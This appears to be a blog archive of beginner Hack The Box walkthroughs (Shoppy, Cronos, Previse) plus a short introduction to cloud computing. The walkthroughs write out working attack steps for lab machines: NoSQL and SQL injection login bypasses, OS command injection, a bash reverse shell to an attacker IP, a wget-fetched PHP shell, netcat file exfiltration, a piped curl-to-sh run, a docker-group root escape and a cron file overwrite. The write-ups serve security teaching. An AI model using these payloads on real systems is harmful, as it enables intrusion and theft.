SF:uration\x20of\x20garbage\x20collection\x20cycles\.\n#\x20TYPE\x20go_gc_
SF:duration_seconds\x20summary\ngo_gc_duration_seconds{quantile=\"0\"}\x20
SF:2\.8354e-05\ngo_gc_duration_seconds{quantile=\"0\.25\"}\x209\.8767e-05\
SF:ngo_gc_d");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 14 19:12:03 2022 -- 1 IP address (1 host up) scanned in 100.75 seconds

Port 9093

9093 is a weird port with an unidentified service. I'll revisit the strings later to see if I can get it to snag something, but for now, I'll interact with the port directly:

┌─[sshad0w@SSHad0w]─[~/Documents/ctf/htb/shoppy]
└──╼ $nc shoppy.htb 9093
ls
HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close

400 Bad Request

Seems to be HTTP based. I can tell it's HTTP based because I notice that the response fit the protocol.

Maybe that's why the protocol was dubbed "copycat". It could be a "copycat service" made to look like HTTP. Since it seems to be HTTP, I'll go ahead and visit it in a browser.

The browser gives me all of these weird messages. My best guess is that it's written in Go considering it says "Go runtime" at the top of the page.

At the very bottom of the page, there's the following line:

Version numbers are always good to follow, so I chased the rabbit down the hole and googled the following:

playbooks_plugin_system_playbook_instance_info{Version="1.29.1"} 1

According to a few sites, this application is a plugin written in go made to monitor memory usage.

After a bit, I found that this is made to monitor Go apps.

(References to alloc and numGC are both in the article mentioned above)

I found something else that looks familiar.

I cross referenced the error with the word "playbook" (because it stood out to me as application specific language), and most of my searches linked back to something called "Mattermost".

I felt like I was in the right place since the words "playbook" and "channel" matched up.

So what is Mattermost?

Now that I've found what's running, Let's actually take a second to understand what it is.

Mattermost seems to be an open source software development solution that allows people to collaborate their efforts without having to pay for a service like Jira, confluence, or any other enterprise level tool. Understanding it's intended purpose will help us understand how to triage it's importance and assess possibly weak points later on. We'll also take note that it's open source, as this may allow us to look through the code for clues on exploitation later.

Mattermost Playbooks

According to the docs, playbooks are basically crontabs within the scope of Mattermost. Or in their words: "Build and configure repeatable processes to achieve specific and predictable outcomes."

Here's more of the documentation

Why did I take note of this? Any time I see code automatically being run without human interaction, at specific time intervals, or when certain conditions are met, I try to take note of what it takes to trigger that code to see if can edit it, or force it to execute outside of it's typical context, I may be able to gain access to information I'm not privy to.

Things like stored procedures, cron jobs, or any conditional arguments linked to time based execution are always interesting things to take note of, and it seems like these playlists can "Build and configure repeatable processes to achieve specific and predictable outcomes."

After finishing the machine, I noticed that this was not the intended path, but I still wonder if there's something I'd be able to leverage here. Maybe I'll do some testing and discover something new.

Port 80

Let's have a look at port 80.

It's a pretty little countdown timer. Let's check robots.txt.

Editors note: On my first pass, I dismissed this as nothing but an error. I simply figured that this gave no more information than "this page doesn't exist". After some research, I learned that this page does give me information. I just didn't know what to look for. The "Cannot GET /page" format is actually native to the NodeJS framework. If I had have understood that information earlier, I would have progressed a lot faster on this machine, as this information would soon be crucial to exploitation. If you didn't know this, make sure you keep your eyes peeled for web framework error messages!

Login

After manually fuzzing the pages, I found the /login page.

Whenever I see a login page (presuming no logging is present), I always try simple default credentials, or common ones like variations of password, admin and other things like that.

It seems like this is configured with a strong passphrase, so I won't be able to break it that way.

http://shoppy.htb/login?error=WrongCredentials

Hm... How do I exploit this?

NoSQL injection

Since the backend is written in NodeJS, a good assumption that any backend database is written using a NoSQL DB like MongoDB. With this assumption, we can try to learn how to trigger a NoSQL injection vulnerability. Without going too far in the details, the difference between the classic SQL injection and it's NoSQL variant is where we're attacking. Since MongoDB is handled at the application level (since MongoDB and NodeJS couple well together), we're actually attacking the application instead of an independent database. That's a very high level and broad statement, but there's more specific information on the internet.

After many attempts, I finally found an exploit string that worked for me:

username=admin' || 'a'=='a&password=hello

I tested this using Burp Suite, but it's also possible to manually exploit via the login page. Without parameterization, it looks like this:

admin' || 'a'=='a

/admin

We're now met with the admin interface of the Shoppy app:

We can click the "search" button.

Using the exploit string from before, we can see all users in the DB:

Since our payload dumps the entire database, we receive the username and password hashes of all of the DB users:

[{
    "_id":"62db0e93d6d6a999a66ee67a",
  "username":"admin",
    "password":"23c6877d9e2b564ef8b32c3a23de27b2"
 },
 {
     "_id":"62db0e93d6d6a999a66ee67b",
  "username":"josh", 
     "password":"6ebcea65320589ca4f2f1ce039975995"
 }
]

Since we're already logged in as admin, we'll login to Josh to see if there's any new information available to us.

Identifying the hashes

Before we try logging into the "Josh" user, we'll need to identify which algorithm they use in order to crack them. There are many tools to do this (such as hashid, hashcat, and Cyber Chef), but we can also throw them into any online hash cracker to see if it will do the heavy lifting for us.

6ebcea65320589ca4f2f1ce039975995    md5 remembermethisway

Nice! So we got Josh's password without much hard work. Again, it's important that we understand how to use hashcat, but once we have that basic knowledge, online tools are fairly helpful as well. If you'd like to learn how to use hashcat, you can read my writeup on Previse.

Now that we have the cleartext password, we'll put it in our notes under "found credentials". We'll remember his password this way (Pun intended!)

Mattermost

I'm not sure what to do, but I remember Mattermost being on this machine, so I looked at documentation on how to authenticate, and I found a page that tells me more about authentication.

Basically, if Mattermost is self hosted, it will most likely be held on a domain that looks like the following:

Gobuster

So I'm going to try looking for vhosting using gobuster. (I'll have to look for virtual hosts given that it's on a *.shoppy.htb scheme site)

gobuster vhost -u shoppy.com -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://shoppy.com
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/12/17 16:33:50 Starting gobuster in VHOST enumeration mode
===============================================================

===============================================================
2022/12/17 16:34:34 Finished
===============================================================

Gobuster turned out to be a bust, but I took a guess and typed http://mattermost.shoppy.htb/ and I got a response back:

Mattermost.shoppy.htb

After adding that to the /etc/hosts file, we get this page:

Let's try logging in with the credentials we learned earlier:

Authenticated Mattermost enumeration

Great! Now that we're logged into the environment, we can look around in their messages and learn more about the environment.

Don't forget to log new usernames/accounts in your notes.

So far, I see 4 accounts.

We have Josh, Jess, Jager, and System.

Hello sysadmin/CEO!

This might be our target later.

Let's poke around look at the business logic before we try to find exploits.

While messing around with the webapp, I found the dark theme! Feel free to change it if it's more comfortable on your eyes ;)

Channels

If you're familiar with discord or slack, Mattermost will feel quite familiar to you.

If you aren't, each tab on the left has different "channels" that discuss various subjects. Each of them focus on a single type of conversation.

Let's check out some of their messages.

Josh and Jaeger talking about the Admin interface.

There may be a password manager written in C++.

Jess' cat. This could be a possible password later.

In a private channel called "Deploy machine", Jaeger tells josh to create an account for him.

I didn't see that account earlier. Maybe Josh hasn't created it yet.

Jaeger might reuse passwords. Let's logout of Josh's account and see if we can become CEO.

jaeger
Sh0ppyBest@pp!

Neither worked.

I could try to login via SSH.

Sweet! I knew that password had to be used somewhere else.

There's our user.txt file.

Linux Privesc Enumeration

After grabbing the user flag, I let's look in the shoppy_start.sh file.

Running sudo -l gives us:

Seems like we need to inspect that file, and the ones around it.

Other than the SUID, this directory is fairly locked down.

This could be path injection. I'm not completely sure, but editing the $PATH variable might allow us to alter the execution flow of this script. I'll take a look at the permissions in this directory and see how the .profile is setup for each user.

.profile:

Since we can't read the source code, let's try running the actual binary to learn more. Because this command needs to be run as another user, we'll have to invoke the binary with the following command:
sudo -u deploy /home/deploy/password-manager

So I guess we'll need some sort of master password?

Not sure if I'm expected to reverse engineer this, or if I'm supposed to try PATH injection. Since there's no way to know which commands were used to make this, path injection would be a shot in the dark. Maybe reverse engineering this file would give us some insight into how it's built, and we may even discover the master password itself.

Transferring files with NC

Before we're able to reverse engineer the program, we'll need to move the file from the target machine, to ours. I've never demonstrated how to transfer a file in a situation like this, and there many ways.

I'd like to mention that this method of transfer is **completely* unencrypted, and if your goal is to be stealthy while hacking, this is not a secure method for transferring files. Red teaming is an entirely different skill. You have to have tact to be tactical!

On our local machine, we'll run the following command to receive the data on port 4490 and name the file "password-manager".

nc -nvlp 4490 > password-manager (Local machine)

Your output should look like this:

On your target machine, you'll need the following command to push the file through:

nc -nvq 0 10.10.14.9 4490 < /home/deploy/password-manager (Remote machine)

Here's what it should look like when you receive a connection:

I should also note that there is no progress bar with this transfer method, but waiting for a full minute should download the full file. (Checking the size of the file on the remote machine and target should be enough.)

Reverse engineering the file

Now that the file is on our machine, we can poke and prod at the file to figure out how it works, what it does, which libraries it uses and more relevant information. Although reverse engineering is it's own discipline, (which will be covered later) this post will only cover the basics of the skill.

Creating a carbon copy (optional)

In my minimal forensics training, a cardinal rule that I've learned is to always make at least one copy of all artifacts before running tests on them. This prevents any original data from being damaged, destroyed, or otherwise modified. I created a copy with cp password-manager password-manager2, and I'll solely run tests on the copied version.

Running the `file` command

Running the file command on unidentified binaries can help you identify what it is, how it was created and more.

It seems to be a standard x64 ELF. Sweet!

Strings

The strings command lists human readable strings inside the binary. This may give us information about how it was built, strings inside and possibly other valuable information that we can use to crack the program.

Interesting... So we know that it will cat the file.

Maybe if we modify the cat binary, we can use path injection to take advantage of this program.

Ghidra

While PATH injection could be our path, let's try reverse engineering the code itself.

Ghidra gives a listing of instructions along with the strings that we saw earlier.

You'll notice that we can simply scroll down and find the password hardcoded in the file:

Now, we see the "access granted" string like earlier!

We can even see the execution flow of what happens after access is granted.

We also could have visited the function and viewed the password in the decompiler:

Let's go back to the copy and verify the password.

It works! Let's do it for real this time on the target machine!

After running the command earlier, we have the password to the "deploy" account! You can log on to the account via the su command, ssh into the account from the local machine, or you can exit your current shell, and log in to the deploy account manually.

We're in. Now that we're on the other side, we can verify how the app was made.

The source code looks very similar to the decompiled version that we saw in Ghidra. Reverse engineering can be extremely powerful.

Shell upgrade for deploy account

Before we move on, we do have a slight problem. We have a dumb shell.

What's a dumb shell? It's a shell that we can't we can't do much with. It's a shell that we can't use modern features like tab autocomplete, arrow keys, screen clearing, and automatic resizing.

You'll know you're in a dumb shell when you see that there's a minimal prompt, and pressing arrow keys will give weird output.

While there are multiple ways to upgrade your shell, if there's a python install on the machine, you can use the following command to upgrade your shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Let's run the command and see what happens:

It seems that we don't have python on the machine. Let's try searching the machine for python and related binaries:

I considered creating a new shell with nc, but I decided to exit it all together and SSH into the machine. Technically, there were still ways to upgrade the shell, but I decided to make it easier on myself and SSH into the machine to have a copacetic experience.

If you're ever on a red team assessment, this technique may not work! Sometimes you don't have the password for every user you log into, and in enterprise environments, SSH login events are recorded and logged.

I thought logging into the account directly would give me a proper shell, but eventually I decided to just run bash for the upgrade.

Deploy Enumeration

Every time we log into a new account, we always need to enumerate.

No SUID binaries or crontab for this user.

While there are Linux privesc tools, I wanted to manually explore a bit before running them.

I found out two things:

1) This is the account that controls Mattermost
2) Containerd is on this machine.

Since Docker was mentioned earlier, I tried to see if anything was running.

Nothing was running.

Linpeas

I don't know what else to do, so I'm going to run linpeas. You can either transfer the file like earlier using nc, transfer it with a simple python webserver, or you can grab it directly from github with curl.

Since we don't care about stealth, we can just run this:

# From github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

If you'd like to use python (like I did), it will look something like this:

Client machine:

Target machine:

Linpeas has a lot of information in it (which means a lot of scrolling!), so I prefer to run it and send it to an output file to retrieve and parse through at my leisure. In order to do this, I used the > redirect operator to write to a file called output.txt:

bash linpeas.sh > output.txt

Let's less the file:

That output was very ugly, so I decided to go with bash linpeas.sh -Nq > output2.txt instead to remove color and banners.

Much better.

*I completed this box a while ago, and since then I've read the linpeas documentation and learned that I could have used less -r output.txt for the first file, and it would have displayed with color. Again, if you see something like the first picture, just use less -r!

After reading all of the linpeas output extensively and researching attack vectors, I decided to ask someone for help. I only mention this because I want to make sure that I remain honest about every single line of code I write, and I take that very seriously. It's alright to ask for help when you're stuck. No one is a master at everything instantly.

The hint I was given was "Did you see in which group deploy user is in?" The path was in the GID all along. Nothing super complicated, nothing extremely advanced. I just had to go back to the basics.

The group

We can find the group id by using the id command:

deploy@shoppy:~$ id
uid=1001(deploy) gid=1001(deploy) groups=1001(deploy),998(docker)

The GID shows that we're a part of the docker group.

Let's search for files with our GID.

you can specify either with the -gid or -group options.. example:
$ find / -name filename -gid 101
or with the group name like:
$ fine / -name filename -group users
man find for more info....

find / -name filename -gid 998

That's way too many "permission denied" messages. Let's see if we can filter that out with grep

find / -name filename -gid 998 2>&1 | grep -v "Permission denied"

find / -name filename -gid 1001 2>&1 | grep -v "Permission denied"

That was a bust. Let's try a different approach. Since we're in the docker group, this means that we can run the actual docker binary. Maybe we should look to see if there are any ways to escalate to root using that program.

After a bit of research, I found that one of my favorite sites had an entry for the docker binary. GTFOBins is an amazing website to use when standard binaries have elevated privileges like SUID, SGID, or something similar. This site is a quick way to see if there are ways to break out of a restricted shell.

With out further ado, let's GTFO of docker!

To achieve a root shell, all we have to do is run the following command:

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Before we run it, let's see what it actually does:

-v Defines the volume to mount to. This allows us to share filesystems between the container and the host machine. When using docker operationally, I use docker's volume feature to ensure that my data persists between each deployment.

From the dockumentation itself:
-v or --volume: Consists of three fields, separated by colon characters (:). The fields must be in the correct order, and the meaning of each field is not immediately obvious.
- In the case of named volumes, the first field is the name of the volume, and is unique on a given host machine. For anonymous volumes, the first field is omitted.
- The second field is the path where the file or directory are mounted in the container.
- The third field is optional, and is a comma-separated list of options, such as ro.
--rm simply removes a container.
-i or --interactive is for keeping STDIN open, even if the container isn't attached.
-t or --tty allocates a psuedo TTY that allows us to interact with the container like a normal shell.
alpine is the base Linux image used in many containers. This image is just to hold the shell. It has most basic functions and features of a standard Unix machine.
chroot is the actual command we're using to set the /mnt directory as our new root.
sh simply allows us to use /bin/sh as our interpreter for our shell

It worked! I'm so glad I wasn't afraid to ask for help. Thank you so much ARZ101!

Hack The Box Writeup: Cronos

SSHad0w — Sun, 05 Jun 2022 15:13:34 +0000

This is a beginner-friendly writeup of Cronos on Hack The Box. I hope you learn something because I sure did! Be sure to comment if you have any questions!

Addding the domain to `/etc/hosts`

Before we do anything, we're going to add the IP to /etc/hosts.

Recon

Nmap

As always, we start with a nmap scan:

Nmap scan

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Cronos
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80

Port 80 is a standard port. Let's see if there's anything on it. Let's view it in the browser:

We get a webpge:

By right-clicking the webpage, we can click the "inspect" option from the drop-down menu.

Viewing the page's source code allows us to see that the website uses a framework called "larvel". It seems to be a web framework built in PHP.

Wappalyzer

Wappalyzer is a fantastic tool for easy investigation of back-end web technologies. It's a simple browser extension that can be installed on firefox.

Technologies

With the help of Wappalyzer, we now have the infrastructure and version numbers of the webserver. This may be important later.

apache.2.4.18
Ubuntu
PHP

port 53

Before we attempt to hammer port 80, let's enumerate more. Port 53 is also available, which means we may be able to do some trickery with DNS.

Version info:
dnsmasq-2.80
9.10.3-P4-Ubuntu

Dig

Dig is an excellent tool for enumerating DNS.

Let's first run dig cronos.htb

; <<>> DiG 9.16.15-Debian <<>> version.bind CHAOS TXT 10.10.10.13
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 33359
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; MBZ: 0x0005, udp: 4096
;; QUESTION SECTION:
;version.bind.          CH  TXT

;; ANSWER SECTION:
version.bind.       5   CH  TXT "dnsmasq-2.80"

;; Query time: 136 msec
;; SERVER: 192.168.74.2#53(192.168.74.2)
;; WHEN: Thu Nov 11 19:23:29 EST 2021
;; MSG SIZE  rcvd: 66

;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7393
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; MBZ: 0x0005, udp: 4096
;; QUESTION SECTION:
;10.10.10.13.           IN  A

;; Query time: 84 msec
;; SERVER: 192.168.74.2#53(192.168.74.2)
;; WHEN: Thu Nov 11 19:23:29 EST 2021
;; MSG SIZE  rcvd: 40

For the sake of brevity, I'll leave interpreting the output up to the reader, but we now have a general idea of what it looks like to run dig with no switches

Let's take a more targeted approach. We will attempt a DNS zone transfer.

### What is a DNS zone transfer?

A DNS zone transfer is when one DNS server needs to give a copy of DNS records to a different DNS server. In an enterprise environment, this is very routine and necessary for each DNS server to have an updated record of DNS records. However, this is a double-edged sword. Hackers can use this functionality to gain access to internal domains inside of an organization. If the attacker copies the DNS records to their local machine, they can now identify and target domains previously unbeknownst to them.

The syntax for a zone transfer is:

dig axfr cronos.htb

Why is the syntax "axfr"? here's the original RFC.

 ; <<>> DiG 9.16.15-Debian <<>> @10.10.10.13 cronos.htb mx
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 37022
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;cronos.htb.                    IN      MX

;; AUTHORITY SECTION:
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800

;; Query time: 99 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Fri Nov 12 09:30:50 EST 2021
;; MSG SIZE  rcvd: 81

The authority section shows alternate subnets.

;; AUTHORITY SECTION:
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800

We now have a new domain! Our zone transfer revealed a new domain. Admin.cronos.htb Let's investigate.

Admin.cronos.htb

When we head to the domain in our browser, we're greeted with a simple login page.

Exploitation

Now that we've done some reconnaissance, we've gathered enough information to attempt to exploit the server.

SQL injection

After some manual fuzzing, we find that the form is vulnerable to SQL injection:

payload "admin' or 1=1;#"

Net Tool

Now that we've bypassed the login, we've found a simple tool. Upon first glance, the tool seems like it can run a few select commands, and the user is allowed to provide arguments.

It seems that we can run the traceroute and ping commands. More than likely, this tool is vulnerable to OS command injection.

OS Command Injection

We see that the tool has hardcoded options, but we can probably control the commands manually in burp suite.

So it's hardcoded here, but we can probably edit this in burp.

When we change the parameters from traceroute, 8.8.8.8 to

pwd,. we get back "/var/www/admin" as a result.

Maybe we can run longer commands by simply commenting out the second parameter.

It doesn't seem to work.

Attempting a reverse shell

When we change the parameters from traceroute, 8.8.8.8 to pwd,. we get back "/var/www/admin as a result.

Maybe we can run longer commands by simply commenting out the second parameter.

It doesn't seem to work.

But this does!

Let's try a reverse shell:

bash -i >& /dev/tcp/10.10.14.67/4444 0>&1

It won't work! Let's look at our source code:

The exec() function is working correctly for every other command. I wonder why my shell isn't working.

No matter, I will find another way.

So the machine has curl so we know we could use that to fetch files. Before we do that, though, let's try wget. A slightly better tool with the same functionality.

Now we've verified that the machine has curl

Now that we've confirmed the existence of downloading tools, we can prop up a quick webserver to host our malicious code.

The download worked flawlessly. We now have our bash shell on the target.

We can look inside it to verify the contents.

Down the rabbit hole

Sometimes, hacking can be very complicated, and attempting to exploit systems can be difficult due to the vast area of attack surface available. While I was exploiting this machine, I fell down a rabbit hole that stopped me from progressing, but when I found that it was a dead end, I took a break, re-evaluated my options, and moved on.

*If you are following along, understand that the next section will be helpful steps on what **NOT* to do while exploiting this machine!*

So running the script directly didn't quite work, but I have a few ideas:

That the photo is only text, and it doesn't have execute permissions yet.
Or I should abandon this idea and upload a proper PHP shell and execute it via web browser.

Trying harder (uploading a PHP shell)

So I have the PHP shell.

Verified the download.

So it did not work. It only shows me the text and fails to execute.

Stepping back

Now that our attempts are failing, I wonder if there's some way to access it. We don't see 3306 anywhere, but we could try logging in via ssh as the admin user.

We have write access. Maybe we could write to the welcome file?

It failed.

If this weren't Hack The Box, I would overwrite the logout file. Since this is a shared instance, I know that overwriting actual functionality is not encouraged.

Rethinking command injection

Another way to exploit Net tool is to terminate the bash script with ; and executes other commands. With this method, it was a lot easier to inject. I didn't even need to mess with burp parameters.

Figuring it all out

Using the same method as before, I used wget again to upload this PHP shell, and it worked when I navigated to it in the browser, which instantly gave me a shell.

My hungry listener is fed.

Upgrading our shell

Now that we have access, we can upgrade our shell.

Let's try the obvious python -c 'import pty; pty.spawn("/bin/bash")' first.

It worked!

Motivational Interlude

Sometimes, red teaming isn't linear. It's all research-based. Sometimes you'll end up down a rabbit hole, and part of being a good hacker is learning how to pull yourself out of the trenches, take a break, stretch, and give it another try later. I wanted to include my mistakes in this blog, so we could all learn together. In hindsight, I understand why my bash shell didn't work and that it should have been PHP all along, and now I'll know for the future.

Post exploitation

The next phase of hacking is "post-exploitation." Even though the name explains that the step is "after exploitation," this step is essentially internal enumeration. We're starting again at the recon phase to hunt for more access!

We now know of a user named "noulis"

While grabbing the user flag, we see a user named "noulis." We're just going to put this in our notes for later.

Standard privesc techniques:

Since this is a Linux machine, we can attempt some common privilege escalation (privesc) techniques. There are a ton of them, but since this machine is rated "easy," I don't think we'll have to try too many of them.

Checking for binaries with `sudo` privileges

sudo -l checks to see if there are any SUID binaries. These files are special files that hold higher privileges than the user we have access to. If we found a weakness in one of those files, we would gain the privilege of the SUID binary.

Regardless, there are no SUID files on this machine, but we should always check for low-hanging fruit, and it's an essential part of my privesc methodology.

Checking for scheduled jobs on the machine

The crontab is a particular file in Linux that performs scheduled jobs at specified times. It allows the user to schedule tasks to occur at specific times. This is extremely helpful from a developer's perspective, but sometimes red teamers abuse poorly written crontabs to manipulate systems.

The syntax to list the cron jobs is: crontab -l

We've now confirmed that there are no cron jobs for the www-data user.

But that doesn't mean that there are no cron jobs on the entire machine. Let's check the /etc/crontab file.

Now we have an idea of all of the scheduled tasks.

The bottom file is interesting. It seems to be continuously executing a configuration file for the laravel framework. I guess that's how the devs got the frontend to function correctly.

*Your output may vary depending on how many people are in the lab!

Checking for networking connections

With netstat -l, we can find all of the users and hosts communicating with the system.

There's the MySQL instance.
Seems like we're the only ones logged in right now.

Reviewing our recon

Now that we have a basic lay of the land let's go back to the crontab and ask some more questions.

The last time I looked, someone overwrote it with a PHP shell.
Now that I've reverted the box, I see the correct information.
I will now overwrite it with a shell of my own.

First, let's verify that we have write privileges.

Now we can transfer the PHP shell the same way we did before and place its contents in the /var/www/laravel/artisan file.

Renaming works too.

*Make sure you set up a listener!

From here, all we have to do is wait...

Root Shell:

Always ask better questions. See you next time!

The Cloud: A Beginner's Look

SSHad0w — Thu, 19 May 2022 16:42:43 +0000

Background

About 20 years ago, the world became a lot more "plugged in". The turn of the century brought the "dot com" era, and many businesses found that outreach was a lot easier to achieve when their advertisements, products, and services could be on the screens of the people at home all across the world.

As a response, companies invested in servers hired web developers, and put their businesses on the internet in the form of websites.

Now, "Websites are hosted on servers" is not a magical realization, and it is not new. However, there is a little more to the story.

Server management

Server management is tedious. The most common reasons are:

Servers take up a tremendous amount of space.
Servers consume an incredibly expensive amount of power.
It's difficult to troubleshoot when things go wrong.
Servers must be manually networked together. For these reasons, most businesses looked for a way to cut the costs of server management.

Introducing "The Cloud"

Enter: "The cloud". Large data-driven companies realized that they could create ways to rent out their servers in a way that multiple customers could share one resource without security breaches, or performance issues. These large companies turned around and sold cloud services to anyone who wanted to rid themselves of hardware management issues. Services like Microsoft Azure, Amazon Web Services, and Google Cloud have been the leaders for the last few decades in cloud services.

How does the Cloud work?

In short, the cloud is nothing but a large collection of servers in an offsite data center. These are simply 3rd party resources that use the same technology and methodology as backing up your mobile phone. You (The client) have the information you'd like to back up in case something goes wrong or data you'd like to store externally. This data is offloaded to a server and kept there for later use. The client can choose when to download those resources for later use. Now there's an extension of storage space for information.

Containers

In the enterprise world, containers are the backbone of the cloud. These are small, easy to manage instances that perform a limited amount of tasks and take up a relatively small amount of computer power and memory. Compared to traditional hardware and virtual machines, containers are the most lightweight solution in modern computing at scale. Every container shares the resources of the underlying kernel, but each of them executes in isolation. In a future blog, we will go in-depth about what containers truly are, and take a more detailed look at how they work.

Why is the cloud so popular in the enterprise?

As we've already covered, migrating to the cloud is extremely powerful and profitable for large data-driven companies, but there is no "one size fits all" solution when it comes to computational solutions. There are many different services that cloud providers will offer. Some of the most popular models are:

Software-as-a-Service (SaaS):

SaaS is the most common service purchased in the cloud computing industry. A quick way to define it is renting software to an enterprise to use and deploy within their own environment for organizational use. Popular examples would be Office 365, Zoom (enterprise), or GitHub. All three of these companies have a model that allows their software to be used for a subscription. All of the data is stored on their servers, so the customers don't even have to worry about physical storage, only paying the annual subscription. Imagine the SaaS client as a business that needs music for events. They rent an external band to play some select songs and use them for a fixed amount of time.

Platform-as-a-Service (PaaS):

If SaaS allows organizations to rent finished enterprise-level software, PaaS allows organizations to rent the tools needed to build their own software. This might look like access to specific operating systems and architecture to build new software. Common examples are Microsoft Azure, Amazon Web Services, (AWS), and Google Cloud. Think of PaaS as the client is a music company that has some of the art tools, but they need temporary access to expensive instruments, certain musicians, and other tools. To create better music of their own.

Infrastructure-as-a-Service (IaaS):

IaaS is a "bare metal" solution to build software from the ground up. IaaS Clients only need a basic workspace to build and test applications. Prime examples are DigitalOcean, IBM SmartCloud, and CloudStack. IaaS clients are like music companies that need to rent the recording studio, but bring all of their instruments, and vocalists, to record their music. They only need a stage.

According to Cloudfare.com, there is another common type of cloud service:

Formerly, SaaS, PaaS, and IaaS were the three main models of cloud computing, and essentially all cloud services fit into one of these categories. However, in recent years a fourth model has emerged:

Function-as-a-Service (FaaS): FaaS, also known as serverless computing, breaks cloud applications down into even smaller components that only run when they are needed. Imagine if it were possible to rent a house one little bit at a time: for instance, the tenant only pays for the dining room at dinner time, the bedroom while they are sleeping, the living room while they are watching TV, and when they are not using those rooms, they don't have to pay rent on them.
FaaS or serverless applications still run on servers, as do all these models of cloud computing. But they are called "serverless" because they do not run on dedicated machines and because the companies building the applications do not have to manage any servers.

Also, serverless functions scale up or duplicate, as more people use the application — imagine if the tenant's dining room could expand on-demand when more people come over for dinner! Learn more about serverless computing (FaaS).

Now that we have an understanding of what the cloud is, how it works, and what it does, we can take a closer look at cloud architecture and how it could be attacked. Always remember two things: The first being that The cloud is just someone else's computer. and to always ask better questions.

Hack The Box Writeup: Previse - SSHad0w

SSHad0w — Sat, 08 Jan 2022 19:03:09 +0000

This is a beginner friendly writeup of Previse on Hack The Box. hope you learn something, because I sure did! Be sure to comment if you have any questions!

Recon

Adding the ip to the `hosts` file

Before anything else, we will add the ip address to our /etc/hosts file.

sudo vi /etc/hosts

Add the ip of the machine and the hostname to the file.

Nmap

# Nmap 7.91 scan initiated Thu Dec 30 21:53:49 2021 as: nmap -sCV -p22,80 -oN previse.nmap previse.htb
Nmap scan report for previse.htb (10.10.11.104)
Host is up (0.029s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 30 21:53:56 2021 -- 1 IP address (1 host up) scanned in 7.87 seconds

Since there are few attacks that can be preformed on port 22, port 80 has the highest priority. Webservers normally have a lot of attack surface, so we'll inspect that first.

Port 80

Seems like a login portal... Nowhere to register so we can't login.

Gobuster

Gobuster is a common tool for enumerating webservers and learning more about the content being stored on server. It can expose obscure directories, find virtual hosts and arbitrary files that would be hard to find by manually fuzzing. Its often used by providing a wordlist to iterate through and search for information based on the wordlist provided.

Enumerating directories with Gobuster

gobuster dir -u http://previse.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

This time, it returned very little, but it is always a good idea to check!

Enumerating Virtual Hosts with Gobuster

gobuster vhost -u previse.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

This time, it returned nothing, but it is always a good idea to check!

Enumerating files with Gobuster

gobuster dir -u http://previse.htb -x php -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt

So we found some files!

┌──(kali㉿kali)-[~/Documents/htb/previse]
└─$ cat gobuster_file.txt | grep 200  
[+] Status codes:   200,204,301,302,307,401,403
/login.php (Status: 200)
/config.php (Status: 200)
